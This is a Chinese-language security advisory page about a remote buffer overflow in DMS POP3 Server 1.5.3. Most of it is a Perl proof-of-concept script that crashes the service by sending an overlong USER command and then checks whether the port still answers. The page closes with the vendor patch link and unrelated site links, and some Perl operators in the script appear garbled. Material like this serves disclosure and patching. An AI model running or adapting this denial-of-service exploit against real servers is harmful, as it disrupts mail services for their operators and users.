DMSPOP3Server远程缓冲区溢出漏洞

Reed Arvin （reedarvin@gmail.com）提供了如下测试方法：

#===== Start DMS_POP3_Overflow.pl =====

#

# Usage: DMS_POP3_Overflow.pl

#

DMS_POP3_Overflow.pl 127.0.0.1 110

#

# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37

#

# Download:

# _blankhttp://www.digitalmapping.sk.ca/pop3srv/default.asp

#

# Patch:

# _blankhttp://www.digitalmapping.sk.ca/pop3srv/Update.asp

#

#####################################################

use IO::Socket;

use strict;

my($socket) = "";

if ($socket = IO::Socket::INET-new(PeerAddr = $ARGV[0],

PeerPort = $ARGV[1],

Proto

= "TCP"))

{

print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";

sleep(1);

print $socket "USER " . "A" x 1023;

close $socket;

sleep(1);

if ($socket = IO::Socket::INET-new(PeerAddr = $ARGV[0],

PeerPort = $ARGV[1],

Proto

= "TCP"))

{

close $socket;

print "failed!\n";

}

else

{

print "successful!\n";

}

}

else

{

print "Cannot connect to $ARGV[0]:$ARGV[1]\n";

}

#===== End DMS_POP3_Overflow.pl =====

建议：

--------------------------------------------------------------------------------

厂商补丁：

Digital Mapping Systems

-----------------------

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载DMS POP3 Server 1.5.4.27：

_blankhttp://www.digitalmapping.sk.ca/pop3srv/Update.asp

• ·程序设计的精品“变速齿轮”再研究
• ·自我防护Web站点和恶意链接的方法
• ·菜鸟动手寻找机器中的“木马”
• ·乌龙院大长篇漫画系列(大开本)(卷十五)(乌龙
• ·在Asp程序中取得表单所有内容的方法
• ·浅谈WindowsXP系统漏洞的封堵
• ·老夫子20--哇哩咧乐队|报价￥6.70|图书
• ·老夫子19--武侠风云|报价￥6.70|图书,
• ·微笑的鱼|报价￥18.70|图书,动漫与幽默,
• ·森林里的秘密|报价￥17.00|图书,动漫与幽